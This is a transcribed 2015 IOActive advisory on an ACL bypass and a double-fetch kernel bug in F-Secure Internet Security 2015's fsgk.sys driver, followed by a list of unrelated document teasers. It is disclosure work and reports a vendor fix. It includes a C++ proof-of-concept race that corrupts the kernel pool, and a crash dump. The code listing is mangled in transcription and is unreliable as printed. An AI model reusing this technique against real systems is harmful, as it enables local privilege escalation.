IOActive Security Advisory
|
|
|
- Lizbeth Montgomery
- 10 years ago
- Views:
Transcription
1 IOActive Security Advisory Title Severity Discovered by Admin ACL Bypass and Double Fetch Issue in F-Secure Internet Security 2015 High/Important Ilja van Sprundel Advisory Date September 3, 2015 Affected Product F-Secure Internet Security 2015 Impact Local users could elevate their privileges to local admin/system/kernel. Background IOActive consultants downloaded and installed F-Secure Internet Security 2015 in a Windows 7, 32-bit virtual machine (VM). The consultants discovered the following security issues: Admin Device ACL Bypass: Allows any user to talk to a kernel device that is ACL ed to admin only. Double/Triple Fetch Bug: Allows a skilled attacker to instruct the kernel to allocate a kernel buffer of one given size and copy data into the buffer, with another (larger) size. This will cause kernel pool memory corruption. This can be leveraged to provide a malicious attacker with local admin/system/kernel privileges. The double fetch bug is dependent on the ACL bypass bug. We believe this issue is of High/Important severity, because it allows a local user to elevate to a highly privileged local user. Both issues were discovered shortly after each other, in the course of a couple of days. The ease of finding these issues is concerning. IOActive strongly recommends that F-Secure perform a security review of their product as to avoid such trivial bug discovery IOActive, Inc. All Rights Reserved [1]
2 Technical Details Entry Point Analysis IOActive downloaded and installed F-Secure Internet Security 2015 in a Windows 7 32 bit virtual machine. Once set up, we ran IrpTracker to see which IRPs were being sent to which drivers. The consultants selected the \Driver\F-Secure Gatekeeper device, allowed it to run for a period of time, and observed the following output: This reveals a number of things. There is an IOCTL IRP being sent from fsgk32.exe to \device\fsgk0. The IOCTL code is 0xc5eaf047, which deconstructed means it is a METHOD_NEITHER IOCTL, requiring READ_ACCESS and WRITE_ACCESS to the handle, with a function code of This is a good entry point IOActive, Inc. All Rights Reserved [2]
3 Bug #1: Device Privileges ProcessHacker shows that fsgk32.exe runs as system, but does indeed hold a handle to \device\fsgk0: Figure 1: Fsgk32.exe runs as system Figure 2: fsgk32.exe has an open handle to \device\fsgk0 DeviceTree reveals the actual ACL on the device: 2015 IOActive, Inc. All Rights Reserved [3]
4 While the device ACL for \device\fsgk0 explicitly states it is only accessible by administrators and the SYSTEM account, the device characteristics are empty. Specifically, they do not contain FILE_DEVICE_SECURE_OPEN. MSDN says the following about that flag: If a device object's FILE_DEVICE_SECURE_OPEN characteristic is set, the system applies the device object's security descriptor to all file open requests in the device's namespace. Drivers can set FILE_DEVICE_SECURE_OPEN when they create the device object with IoCreateDevice or IoCreateDeviceSecure. FILE_DEVICE_SECURE_OPEN was specifically added in Windows 2000 to distinguish between File System drivers and other drivers. If the flag is not set (as is the case here) the ACL is applied only to the device, not any file inside of it. That is to say, any open as nonadmin of \device\fsgk0 will fail, but any open of \device\fsgk0\something will succeed. Because the FILE_DEVICE_SECURE_OPEN flag is not set, the IO Manager assumes this is a file system driver, and as such, will implement its own ACLs on files and directories inside the device. Since this is not a file system driver, this is a pretty straight forward ACL bypass, and bug # IOActive, Inc. All Rights Reserved [4]
5 Device Name While \Device\FSGK0 is the device name, the exposed symbolic link to userland has a different name. The consultants used WinObj to find the symbolic link: The symbolic link is called FSGateKeeperDev. This allows any non-admin user to CreateFile for \\\\.\\FSGateKeeperDev\something and get a valid handle back IOActive, Inc. All Rights Reserved [5]
6 Image File Name At this point, some reverse engineering was required. The first step is finding the right image path for this driver. IOActive consultants did this using DriverQuery: DriverQuery shows the image file is located in c:\program files\f- Secure\SAFE\apps\ComputerSecurity\Anti-Virus\minifilter\fsgk.sys IOActive, Inc. All Rights Reserved [6]
7 Bug #2: Reverse Engineering When opening this image up in IDA Pro, its DriverEntry looks like: Clearly showing the WDM driver model is used, with an IOCTL dispatch major function defined. The ioctl_dispatch function looks like: Showing the dispatch routine is a simple wrapper around an IOCTL handler, which looks like: 2015 IOActive, Inc. All Rights Reserved [7]
8 This is a classic IOCTL handler, which extracts the IOCTL code from the IRP stack, and implements a switch/case to handle IOCTL codes. The code above shows the case for the 0xc5eaf047 IOCTL code. This matches the one found using IrpTracker (see above). It basically checks the input and output buffer are 20, and if so, calls ioctl_type_3089 function. This looks like: 2015 IOActive, Inc. All Rights Reserved [8]
9 2015 IOActive, Inc. All Rights Reserved [9]
10 This function probes the input and output pointers and contains another switch/case, which is basically a sub type handler. Looking at ioctl_type_3089_subtype_2: This is basically a simple wrapper. The internal version looks like: This is the guts of subtype 2. And contains two double fetch (and triple fetch) bugs. Let s go over this step by step IOActive, Inc. All Rights Reserved [10]
11 Bug #2 Line 32 to 36 contains several length checks. On line 32 there is an overall length check to see if the data contained in the input buffer is 22 bytes long. Line 34 contains another length check, for an embedded length at databuf+8 (deref to dword), this length has to be < the overall length (tested for on line 32). Also on line 34, 2 more length fields (databuf+12 and databuf+16) are extracted and put in v6 and v7 (+v6). This combined length is then bounds checked at line 36 (and an int overflow check is done at line 35). This all sounds reasonable and sane. The length at databuf+12 is then used to allocate a buffer. It needs to be noted that there is a double fetch here! That is to say, the length was never captured, and is fetched from the pointer again. Since we re dealing with METHOD_NEITHER, this is a userland pointer, and as such, can change at any given time. This means, given a malicious attacker, the length being used to allocate on line 41 does not have to be the same length that is being validated on line This is an on itself isn t a huge problem, since there s just an imbalance here. However When looking at line 49 a triple fetch is done! The length is once again being read from a userland pointer, and used as the length field in a memcpy()! This is pretty bad. This means the length on line 41 and line 49 do not have to be the same, and it could be larger on line 49, given a malicious attacker (using a 2nd thread to modify the embedded length field, in user memory). This does in fact cause in kernel pool corruption, as will be shown later. Line 51 contains a double fetch identical to the one on line 41. Line 58 contains a triple fetch identical to the one on line 49. That one can cause in kernel pool corruption as well. Proof of Concept Before showing the proof of concept exploit, let s go over the layout of the data to exploit this bug. Data Layout In ioctl_handler we see there is a bounds check that makes sure inlen is 20 bytes. This means the data has a header, and it is 20 bytes long. Following that, in ioctl_type_3089, we see the first four bytes in the header have to be the subtype. The rest of the header does not seem to matter all that much. Because of some embedded flag checking in ioctl_type_3089_subtype_2, the third DWORD in the header is set to 0. It is also in ioctl_type_3089 where the databuf pointer is defined. This points to right after the header (inputbuffer+20). The content of DataBuf can be derived by looking at ioctl_type_3089_subtype_2_internal. The first two DWORDs can be ignored. The following DWORD seems to be some kind of total length. The DWORD after that a partial len, and the DWORD after that another partial len. This gives us the follow data representation: Header: 0x <4 bytes> 0x <4 bytes> <4 bytes> data : <4 bytes> <4 bytes> totallen partlen1 partlen IOActive, Inc. All Rights Reserved [11]
12 Exploit Code The proof of concept for this issue looks as follows: // fsecurepoc.cpp : Defines the entry point for the console application. // #include "stdafx.h" #include <Windows.h> char buf[10000]; char obuf[10000]; DWORD WINAPI ChangeLen(LPVOID lpparameter) { unsigned int *cip = (unsigned int *)lpparameter; while (1) { if (*cip == 10) { *cip = 9900; else { *cip = 10; /* Header: 0x <4 bytes> 0x <4 bytes> <4 bytes> data : <4 bytes> <4 bytes> totallen partlen1 partlen2 double / triple fetch of partlen1 and partlen2 */ void TriggerPoc(HANDLE h) { unsigned int *ip = (unsigned int *)buf; unsigned int *cip; DWORD ret = 0; memset(buf, 0x41, 10000); /* header */ *ip = 2; *ip = 0; /* data */ *ip = 5000; cip = ip; *ip = 10; *ip = 20; DWORD tid = 0; HANDLE th = CreateThread(NULL, 0, ChangeLen, cip, 0, &tid); int i = 0; for (i = 0; i < ; i++) { DeviceIoControl(h, 0xc5eaf047, buf, 10000, obuf, 10000, &ret, NULL); TerminateThread(th, 0); 2015 IOActive, Inc. All Rights Reserved [12]
13 int main() { HANDLE h = CreateFile(L"\\\\.\\FSGateKeeperDev\\ILJA", GENERIC_READ GENERIC_WRITE, FILE_SHARE_WRITE FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (h == INVALID_HANDLE_VALUE) { printf("createfile() failed\n"); goto END; else { printf("success\n"); TriggerPoc(h); END: getchar(); return 0; Debugger Analysis When run, this code will trigger a bugcheck almost immediately. The dump analysis in windbg looks as follows: Microsoft (R) Windows Debugger Version AMD64 Copyright (c) Microsoft Corporation. All rights reserved. Loading Dump File [C:\Users\ilja\Desktop\FSECURE_DUMP_ dmp] Mini Kernel Dump File: Only registers and stack trace are available Symbol search path is: SRV*C:\Windows\symbol_cache* Executable search path is: Windows 7 Kernel Version 7601 (Service Pack 1) MP (4 procs) Free x86 compatible Product: WinNt, suite: TerminalServer SingleUserTS Built by: x86fre.win7sp1_gdr Machine Name: Kernel base = 0x82a48000 PsLoadedModuleList = 0x82b93e30 Debug session time: Sun Aug 23 16:09: (UTC - 7:00) System Uptime: 0 days 8:36: Loading Kernel Symbols Loading User Symbols Loading unloaded module list... 1: kd>!analyze -v ************************************************************************** ***** * * * Bugcheck Analysis * * * ************************************************************************** ***** BAD_POOL_HEADER (19) The pool is already corrupt at the time of the current request. This may or may not be due to the caller. The internal pool links must be walked to figure out a possible cause of 2015 IOActive, Inc. All Rights Reserved [13]
14 the problem, and then special pool applied to the suspect tags or the driver verifier to a suspect driver. Arguments: Arg1: , a pool block header size is corrupt. Arg2: c14f7410, The pool entry we were looking for within the page. Arg3: c14f7430, The next pool entry. Arg4: 0a040605, (reserved) Debugging Details: BUGCHECK_STR: 0x19_20 POOL_ADDRESS: GetPointerFromAddress: unable to read from 82bb484c Unable to read MiSystemVaType memory at 82b93780 c14f7410 CUSTOMER_CRASH_COUNT: 1 DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT CURRENT_IRQL: 0 LAST_CONTROL_TRANSFER: from a67885c5 to 82b6ac6b STACK_TEXT: b46db9f0 a67885c5 c14f b46dba20 nt!exfreepoolwithtag+0x1b1 WARNING: Stack unwind information not available. Following frames may be wrong. b46dba00 a678c922 c14f e8 fsgk+0xd5c5 b46dba20 a678cdc9 011ca14c fc 011cc848 fsgk+0x11922 à ioctl_type_3089_subtype_2_internal b46dba34 a678e ca ca14c fc fsgk+0x11dc9 à ioctl_type_3089_subtype_2 b46dba5c a678f3e9 011ca fc 011cc85c fsgk+0x13965 à ioctl_type_3089 b46dba8c a677ccc ecf 86f92a98 fsgk+0x143e9 à ioctl_handler b46dbac4 82a7ed7d 87e679c8 87b88a08 87b88a08 fsgk+0x1cc4 à ioctl_dispatch b46dbadc 82c761d b88a08 87b88a78 nt!iofcalldriver+0x63 b46dbafc 82c794bc 87e679c8 86f92a nt!iopsynchronousservicetail+0x1f8 b46dbbd0 82cc05d5 87e679c8 87b88a nt!iopxxxcontrolfile+0x7a9 b46dbc04 82a85a nt!ntdeviceiocontrolfile+0x2a b46dbc b nt!kisystemservicepostcall 0027e98c x774871b4 STACK_COMMAND: kb FOLLOWUP_IP: fsgk+d5c5 a67885c5????? SYMBOL_STACK_INDEX: 1 SYMBOL_NAME: fsgk+d5c5 FOLLOWUP_NAME: MachineOwner MODULE_NAME: fsgk IMAGE_NAME: fsgk.sys DEBUG_FLR_IMAGE_TIMESTAMP: 5590de95 FAILURE_BUCKET_ID: 0x19_20_fsgk+d5c5 BUCKET_ID: 0x19_20_fsgk+d5c5 Followup: MachineOwner 2015 IOActive, Inc. All Rights Reserved [14]
15 Fixes Timeline 8/23/2015: IOActive discovers vulnerability 8/23/2015: IOActive notifies vendor 9/1/2015: f-secure fixed the issues 9/3/2015: IOActive advisory published 2015 IOActive, Inc. All Rights Reserved [15]
HTC Windows Phone 7 Arbitrary Read/Write of Kernel Memory 10/11/2011
MWR InfoSecurity Advisory HTC Windows Phone 7 Arbitrary Read/Write of Kernel Memory 10/11/2011 Package Name Date 10/11/2011 Affected Versions HTC Windows Phone 7 Phones HTC HD7 confirmed to be vulnerable.
SMTP-32 Library. Simple Mail Transfer Protocol Dynamic Link Library for Microsoft Windows. Version 5.2
SMTP-32 Library Simple Mail Transfer Protocol Dynamic Link Library for Microsoft Windows Version 5.2 Copyright 1994-2003 by Distinct Corporation All rights reserved Table of Contents 1 Overview... 5 1.1
Bypassing Memory Protections: The Future of Exploitation
Bypassing Memory Protections: The Future of Exploitation Alexander Sotirov [email protected] About me Exploit development since 1999 Research into reliable exploitation techniques: Heap Feng Shui in JavaScript
Format string exploitation on windows Using Immunity Debugger / Python. By Abysssec Inc WwW.Abysssec.Com
Format string exploitation on windows Using Immunity Debugger / Python By Abysssec Inc WwW.Abysssec.Com For real beneficiary this post you should have few assembly knowledge and you should know about classic
IOActive Security Advisory
IOActive Security Advisory Title Severity Discovered by CVE Lenovo s System Update Uses a Predictable Security Token High Michael Milvich [email protected] Sofiane Talmat [email protected]
Using a Patched Vulnerability to Bypass Windows 8 x64 Driver Signature Enforcement. MJ0011 [email protected]
Using a Patched Vulnerability to Bypass Windows 8 x64 Driver Signature Enforcement MJ0011 [email protected] Agenda Background A Patched Vulnerability: CVE-2010-4398 Bypass DSE on Windows7 x64 Windows8
FRONT FLYLEAF PAGE. This page has been intentionally left blank
FRONT FLYLEAF PAGE This page has been intentionally left blank Abstract The research performed under this publication will combine virtualization technology with current kernel debugging techniques to
Bypassing Browser Memory Protections in Windows Vista
Bypassing Browser Memory Protections in Windows Vista Mark Dowd & Alexander Sotirov [email protected] [email protected] Setting back browser security by 10 years Part I: Introduction Thesis Introduction
Linux Driver Devices. Why, When, Which, How?
Bertrand Mermet Sylvain Ract Linux Driver Devices. Why, When, Which, How? Since its creation in the early 1990 s Linux has been installed on millions of computers or embedded systems. These systems may
Windows Kernel Internals for Security Researchers
Windows Kernel Internals for Security Researchers Overview This course takes a deep dive into the internals of the Windows kernel from a security perspective. Attendees learn about behind the scenes working
EMC RepliStor for Microsoft Windows ERROR MESSAGE AND CODE GUIDE P/N 300-002-826 REV A02
EMC RepliStor for Microsoft Windows ERROR MESSAGE AND CODE GUIDE P/N 300-002-826 REV A02 EMC Corporation Corporate Headquarters: Hopkinton, MA 01748-9103 1-508-435-1000 www.emc.com Copyright 2003-2005
Chapter 6, The Operating System Machine Level
Chapter 6, The Operating System Machine Level 6.1 Virtual Memory 6.2 Virtual I/O Instructions 6.3 Virtual Instructions For Parallel Processing 6.4 Example Operating Systems 6.5 Summary Virtual Memory General
Applying Clang Static Analyzer to Linux Kernel
Applying Clang Static Analyzer to Linux Kernel 2012/6/7 FUJITSU COMPUTER TECHNOLOGIES LIMITED Hiroo MATSUMOTO 管 理 番 号 1154ka1 Copyright 2012 FUJITSU COMPUTER TECHNOLOGIES LIMITED Abstract Now there are
Software Vulnerabilities
Software Vulnerabilities -- stack overflow Code based security Code based security discusses typical vulnerabilities made by programmers that can be exploited by miscreants Implementing safe software in
Debugging Multi-threaded Applications in Windows
Debugging Multi-threaded Applications in Windows Abstract One of the most complex aspects of software development is the process of debugging. This process becomes especially challenging with the increased
Review and Exploit Neglected Attack Surface in ios 8. Tielei Wang, Hao Xu, Xiaobo Chen of TEAM PANGU
Review and Exploit Neglected Attack Surface in ios 8 Tielei Wang, Hao Xu, Xiaobo Chen of TEAM PANGU BlackHat 2015 Agenda ios Security Background Review of Attack Surfaces Fuzz More IOKit and MIG System
Custom Penetration Testing
Custom Penetration Testing Compromising a Vulnerability through Discovery and Custom Exploitation Stephen Sims Advanced Penetration Testing - 2009 SANS 1 Objectives Penetration Testing Precompiled Tools
Exploiting nginx chunked overflow bug, the undisclosed attack vector
Exploiting nginx chunked overflow bug, the undisclosed attack vector Long Le [email protected] About VNSECURITY.NET CLGT CTF team 2 VNSECURITY.NET In this talk Nginx brief introduction Nginx chunked
Windows XP SP3 Registry Handling Buffer Overflow
Windows XP SP3 Registry Handling Buffer Overflow by Matthew j00ru Jurczyk and Gynvael Coldwind Hispasec 1. Basic Information Name Windows XP SP3 Registry Handling Buffer Overflow Class Design Error Impact
Java and Java Virtual Machine Security
Java and Java Virtual Machine Security Vulnerabilities and their Exploitation Techniques by Last Stage of Delirium Research Group http://lsd-pl.net Version: 1.0.0 Updated: October 2nd, 2002 Copyright c
Exceptions in MIPS. know the exception mechanism in MIPS be able to write a simple exception handler for a MIPS machine
7 Objectives After completing this lab you will: know the exception mechanism in MIPS be able to write a simple exception handler for a MIPS machine Introduction Branches and jumps provide ways to change
The Windows NT Device Driver Book: A Guide for Programmers
- The Windows NT Device Driver Book: A Guide for Programmers Art Baker Cydonix Corporation To join a Prentice Hall PTR Internet mailing list, point to: http://www.prenhall.com/register Prentice Hall PTR
The Native AFS Client on Windows The Road to a Functional Design. Jeffrey Altman, President Your File System Inc.
The Native AFS Client on Windows The Road to a Functional Design Jeffrey Altman, President Your File System Inc. 14 September 2010 The Team Peter Scott Principal Consultant and founding partner at Kernel
Computer Security: Principles and Practice
Computer Security: Principles and Practice Chapter 24 Windows and Windows Vista Security First Edition by William Stallings and Lawrie Brown Lecture slides by Lawrie Brown Windows and Windows Vista Security
Title: Bugger The Debugger - Pre Interaction Debugger Code Execution
White Paper Title: Bugger The Debugger Pre Interaction Debugger Code Execution Prepared by: Brett Moore Network Intrusion Specialist, CTO SecurityAssessment.com Date: April 2005 Abstract The use of debuggers
Off-by-One exploitation tutorial
Off-by-One exploitation tutorial By Saif El-Sherei www.elsherei.com Introduction: I decided to get a bit more into Linux exploitation, so I thought it would be nice if I document this as a good friend
Exploiting Trustzone on Android
1 Introduction Exploiting Trustzone on Android Di Shen(@returnsme) [email protected] This paper tells a real story about exploiting TrustZone step by step. I target an implementation of Trusted Execution
Leak Check Version 2.1 for Linux TM
Leak Check Version 2.1 for Linux TM User s Guide Including Leak Analyzer For x86 Servers Document Number DLC20-L-021-1 Copyright 2003-2009 Dynamic Memory Solutions LLC www.dynamic-memory.com Notices Information
Caml Virtual Machine File & data formats Document version: 1.4 http://cadmium.x9c.fr
Caml Virtual Machine File & data formats Document version: 1.4 http://cadmium.x9c.fr Copyright c 2007-2010 Xavier Clerc [email protected] Released under the LGPL version 3 February 6, 2010 Abstract: This
ERNW Newsletter 51 / September 2015
ERNW Newsletter 51 / September 2015 Playing With Fire: Attacking the FireEye MPS Date: 9/10/2015 Classification: Author(s): Public Felix Wilhelm TABLE OF CONTENT 1 MALWARE PROTECTION SYSTEM... 4 2 GAINING
MarshallSoft AES. (Advanced Encryption Standard) Reference Manual
MarshallSoft AES (Advanced Encryption Standard) Reference Manual (AES_REF) Version 3.0 May 6, 2015 This software is provided as-is. There are no warranties, expressed or implied. Copyright (C) 2015 All
Unix Security Technologies. Pete Markowsky <peterm[at] ccs.neu.edu>
Unix Security Technologies Pete Markowsky What is this about? The goal of this CPU/SWS are: Introduce you to classic vulnerabilities Get you to understand security advisories Make
Bug hunting. Vulnerability finding methods in Windows 32 environments compared. FX of Phenoelit
Bug hunting Vulnerability finding methods in Windows 32 environments compared FX of Phenoelit The goal: 0day What we are looking for: Handles network side input Runs on a remote system Is complex enough
Persist It Using and Abusing Microsoft s Fix It Patches
Persist It Using and Abusing Microsoft s Fix It Patches Jon Erickson : isight Partners : [email protected] Abstract: Microsoft has often used Fix it patches, which are a subset of Application
How To Port A Program To Dynamic C (C) (C-Based) (Program) (For A Non Portable Program) (Un Portable) (Permanent) (Non Portable) C-Based (Programs) (Powerpoint)
TN203 Porting a Program to Dynamic C Introduction Dynamic C has a number of improvements and differences compared to many other C compiler systems. This application note gives instructions and suggestions
Modern Binary Exploitation Course Syllabus
Modern Binary Exploitation Course Syllabus Course Information Course Title: Modern Binary Exploitation Course Number: CSCI 4968 Credit Hours: 4 Semester / Year: Spring 2015 Meeting Days: Tuesday/Friday
Melde- und Analysestelle Informationssicherung MELANI Torpig/Mebroot Reverse Code Engineering (RCE)
Melde- und Analysestelle Informationssicherung MELANI Torpig/Mebroot Reverse Code Engineering (RCE) Andreas Greulich, MELANI Swiss Cyber Storm, 18 April 2009 Agenda Part 1: Introduction (~5 ) Infection
Hotpatching and the Rise of Third-Party Patches
Hotpatching and the Rise of Third-Party Patches Alexander Sotirov [email protected] BlackHat USA 2006 Overview In the next one hour, we will cover: Third-party security patches _ recent developments
Understanding Windows File System Transactions
Understanding Windows File System Transactions Christian Allred Senior Software Development Engineer Microsoft Agenda Filesystems Today Transactional NTFS (TxF) TxF Scenarios Distributed TxF Transactions
Motorola 8- and 16-bit Embedded Application Binary Interface (M8/16EABI)
Motorola 8- and 16-bit Embedded Application Binary Interface (M8/16EABI) SYSTEM V APPLICATION BINARY INTERFACE Motorola M68HC05, M68HC08, M68HC11, M68HC12, and M68HC16 Processors Supplement Version 2.0
Compromise-as-a-Service
ERNW GmbH Carl-Bosch-Str. 4 D-69115 Heidelberg 3/31/14 Compromise-as-a-Service Our PleAZURE Felix Wilhelm & Matthias Luft {fwilhelm, mluft}@ernw.de ERNW GmbH Carl-Bosch-Str. 4 D-69115 Heidelberg Agenda
Introduction. Figure 1 Schema of DarunGrim2
Reversing Microsoft patches to reveal vulnerable code Harsimran Walia Computer Security Enthusiast 2011 Abstract The paper would try to reveal the vulnerable code for a particular disclosed vulnerability,
Copyright 2006-2011 Winfrasoft Corporation. All rights reserved.
Installation and Configuration Guide Installation and configuration guide Adding X-Forwarded-For logging support to Microsoft Internet Information Server 6.0 & 7.0 Published: January 2013 Applies to: Winfrasoft
Gigabit Ethernet Packet Capture. User s Guide
Gigabit Ethernet Packet Capture User s Guide Copyrights Copyright 2008 CACE Technologies, Inc. All rights reserved. This document may not, in whole or part, be: copied; photocopied; reproduced; translated;
esrever gnireenigne tfosorcim seiranib
esrever gnireenigne tfosorcim seiranib Alexander Sotirov [email protected] CanSecWest / core06 Reverse Engineering Microsoft Binaries Alexander Sotirov [email protected] CanSecWest / core06 Overview
File Management. Chapter 12
Chapter 12 File Management File is the basic element of most of the applications, since the input to an application, as well as its output, is usually a file. They also typically outlive the execution
umps software development
Laboratorio di Sistemi Operativi Anno Accademico 2006-2007 Software Development with umps Part 2 Mauro Morsiani Software development with umps architecture: Assembly language development is cumbersome:
Peach Fuzzer Platform
Fuzzing is a software testing technique that introduces invalid, malformed, or random data to parts of a computer system, such as files, network packets, environment variables, or memory. How the tested
McAfee Endpoint Encryption for Files and Folders. Best Practices. For EEFF product version 4.0.0
McAfee Endpoint Encryption for Files and Folders Best Practices For EEFF product version 4.0.0 McAfee, Inc. McAfee, Inc., 2821 Mission College Blvd., Santa Clara, CA 95054, USA Tel: (+1) 888.847.8766 Internet:
Revealing Embedded Fingerprints: Deriving intelligence from USB stack interactions
Revealing Embedded Fingerprints: Deriving intelligence from USB stack interactions Andy Davis, Research Director NCC Group Image from: p1fran.com UK Offices Manchester - Head Office Cheltenham Edinburgh
Arithmetic Coding: Introduction
Data Compression Arithmetic coding Arithmetic Coding: Introduction Allows using fractional parts of bits!! Used in PPM, JPEG/MPEG (as option), Bzip More time costly than Huffman, but integer implementation
Setting Up a Windows Virtual Machine for SANS FOR526
Setting Up a Windows Virtual Machine for SANS FOR526 As part of the Windows Memory Forensics course, SANS FOR526, you will need to create a Windows virtual machine to use in class. We recommend using VMware
Embedded devices as an attack vector
[email protected] Computer Laboratory University of Cambridge 21C3 1 Embedded devices Threat model Aims 2 Why use embedded devices? Why is using embedded devices hard? Reverse engineering techniques
Traditional IBM Mainframe Operating Principles
C H A P T E R 1 7 Traditional IBM Mainframe Operating Principles WHEN YOU FINISH READING THIS CHAPTER YOU SHOULD BE ABLE TO: Distinguish between an absolute address and a relative address. Briefly explain
CA Unified Infrastructure Management
CA Unified Infrastructure Management Probe Guide for IIS Server Monitoring iis v1.7 series Copyright Notice This online help system (the "System") is for your informational purposes only and is subject
Mining for Bugs with Graph Database Queries
Mining for Bugs with Graph Database Queries Fabian Yamaguchi (@fabsx00) 31C3 GEORG-AUGUST-UNIVERSITÄT GÖTTINGEN Hello 31C3!» It s been 5 years since my last CCC talk» Talk back then: mostly about hard
CA ARCserve Backup for Windows
CA ARCserve Backup for Windows Agent for Sybase Guide r16 This Documentation, which includes embedded help systems and electronically distributed materials, (hereinafter referred to as the Documentation
Unverified Fields - A Problem with Firewalls & Firewall Technology Today
Unverified Fields - A Problem with Firewalls & Firewall Technology Today Ofir Arkin The Sys-Security Group [email protected] October 2000 1 Introduction The following problem (as discussed in
Reverse Engineering and Computer Security
Reverse Engineering and Computer Security Alexander Sotirov [email protected] Introduction Security researcher at Determina, working on our LiveShield product Responsible for vulnerability analysis and
Attacking Host Intrusion Prevention Systems. Eugene Tsyrklevich [email protected]
Attacking Host Intrusion Prevention Systems Eugene Tsyrklevich [email protected] Agenda Introduction to HIPS Buffer Overflow Protection Operating System Protection Conclusions Demonstration
http://www.nologin.org Bypassing Windows Hardware-enforced Data Execution Prevention
http://www.nologin.org Bypassing Windows Hardware-enforced Data Execution Prevention Oct 2, 2005 skape [email protected] Skywing [email protected] One of the big changes that Microsoft introduced
µtasker Document FTP Client
Embedding it better... µtasker Document FTP Client utaskerftp_client.doc/1.01 Copyright 2012 M.J.Butcher Consulting Table of Contents 1. Introduction...3 2. FTP Log-In...4 3. FTP Operation Modes...4 4.
I Control Your Code Attack Vectors Through the Eyes of Software-based Fault Isolation. Mathias Payer, ETH Zurich
I Control Your Code Attack Vectors Through the Eyes of Software-based Fault Isolation Mathias Payer, ETH Zurich Motivation Applications often vulnerable to security exploits Solution: restrict application
MatrixSSL Developer s Guide
MatrixSSL Developer s Guide This document discusses developing with MatrixSSL. It includes instructions on integrating MatrixSSL into an application and a description of the configurable options for modifying
F-Secure Internet Security 2014 Data Transfer Declaration
F-Secure Internet Security 2014 Data Transfer Declaration The product s impact on privacy and bandwidth usage F-Secure Corporation April 15 th 2014 Table of Contents Version history... 3 Abstract... 3
System Security Fundamentals
System Security Fundamentals Alessandro Barenghi Dipartimento di Elettronica, Informazione e Bioingegneria Politecnico di Milano alessandro.barenghi - at - polimi.it April 28, 2015 Lesson contents Overview
Kernel Intrusion Detection System
Kernel Intrusion Detection System Rodrigo Rubira Branco [email protected] [email protected] Monica's Team!! Brazilian famous H.Q. story Amazon Forest Yeah, Brazilian country! Soccer Brazilian
FREQUENTLY ASKED QUESTIONS
FREQUENTLY ASKED QUESTIONS Secure Bytes, October 2011 This document is confidential and for the use of a Secure Bytes client only. The information contained herein is the property of Secure Bytes and may
Installation and configuration guide
Installation and Configuration Guide Installation and configuration guide Adding X-Forwarded-For support to Forward and Reverse Proxy TMG Servers Published: May 2010 Applies to: Winfrasoft X-Forwarded-For
NDK: NOVELL NSS AUDIT
www.novell.com/documentation NDK: NOVELL NSS AUDIT Developer Kit August 2015 Legal Notices Novell, Inc., makes no representations or warranties with respect to the contents or use of this documentation,
A Dozen Years of Shellphish From DEFCON to the Cyber Grand Challenge
A Dozen Years of Shellphish From DEFCON to the Cyber Grand Challenge Antonio Bianchi [email protected] University of California, Santa Barbara HITCON Enterprise August 27th, 2015 Agenda Shellphish The
Discovering passwords in the memory
Discovering passwords in the memory Abhishek Kumar ([email protected]) November 2003 Escalation of privileges is a common method of attack where a low privileged user exploits a vulnerability
Attacking Obfuscated Code with IDA Pro. Chris Eagle
Attacking Obfuscated Code with IDA Pro Chris Eagle Outline Introduction Operation Demos Summary 2 First Order Of Business MOVE UP AND IN! There is plenty of room up front I can't increase the font size
UniFinger Engine SDK Manual (sample) Version 3.0.0
UniFinger Engine SDK Manual (sample) Version 3.0.0 Copyright (C) 2007 Suprema Inc. Table of Contents Table of Contents... 1 Chapter 1. Introduction... 2 Modules... 3 Products... 3 Licensing... 3 Supported
SOA Software: Troubleshooting Guide for Agents
SOA Software: Troubleshooting Guide for Agents SOA Software Troubleshooting Guide for Agents 1.1 October, 2013 Copyright Copyright 2013 SOA Software, Inc. All rights reserved. Trademarks SOA Software,
Implementation of Web Application Firewall
Implementation of Web Application Firewall OuTian 1 Introduction Abstract Web 層 應 用 程 式 之 攻 擊 日 趨 嚴 重, 而 國 內 多 數 企 業 仍 不 知 該 如 何 以 資 安 設 備 阻 擋, 仍 在 採 購 傳 統 的 Firewall/IPS,
Linux Kernel. Security Report
Linux Kernel Security Report September 25 Authors: Andy Chou, Bryan Fulton and Seth Hallem Coverity has combined two years of analysis work carried out in a commercial setting at Coverity with four years
IVI Configuration Store
Agilent Developer Network White Paper Stephen J. Greer Agilent Technologies, Inc. The holds information about IVI drivers installed on the computer and configuration information for an instrument system.
Workshop on Network Traffic Capturing and Analysis IITG, DIT, CERT-In, C-DAC. Host based Analysis. {Himanshu Pareek, himanshup@cdac.
Workshop on Network Traffic Capturing and Analysis IITG, DIT, CERT-In, C-DAC Host based Analysis {Himanshu Pareek, [email protected]} {C-DAC Hyderabad, www.cdachyd.in} 1 Reference to previous lecture Bots
Advanced Endpoint Protection Overview
Advanced Endpoint Protection Overview Advanced Endpoint Protection is a solution that prevents Advanced Persistent Threats (APTs) and Zero-Day attacks and enables protection of your endpoints by blocking
CSC 2405: Computer Systems II
CSC 2405: Computer Systems II Spring 2013 (TR 8:30-9:45 in G86) Mirela Damian http://www.csc.villanova.edu/~mdamian/csc2405/ Introductions Mirela Damian Room 167A in the Mendel Science Building [email protected]
A Comparison of the Linux and Windows Device Driver Architectures
A Comparison of the Linux and Windows Device Driver Architectures Melekam Tsegaye Rhodes University, South Africa [email protected] Richard Foss Rhodes University, South Africa [email protected] Abstract:
CA Nimsoft Monitor. Probe Guide for Active Directory Server. ad_server v1.4 series
CA Nimsoft Monitor Probe Guide for Active Directory Server ad_server v1.4 series Legal Notices Copyright 2013, CA. All rights reserved. Warranty The material contained in this document is provided "as
Google Apps Engine. G-Jacking AppEngine-based applications. Presented 30/05/2014. For HITB 2014 By Nicolas Collignon and Samir Megueddem
Google Apps Engine G-Jacking AppEngine-based applications Presented 30/05/2014 For HITB 2014 By Nicolas Collignon and Samir Megueddem Introduction to GAE G-Jacking The code The infrastructure The sandbox
Intel TSX (Transactional Synchronization Extensions) Mike Dai Wang and Mihai Burcea
Intel TSX (Transactional Synchronization Extensions) Mike Dai Wang and Mihai Burcea 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 Example: toy banking application with RTM Code written and tested in
Webapps Vulnerability Report
Tuesday, May 1, 2012 Webapps Vulnerability Report Introduction This report provides detailed information of every vulnerability that was found and successfully exploited by CORE Impact Professional during
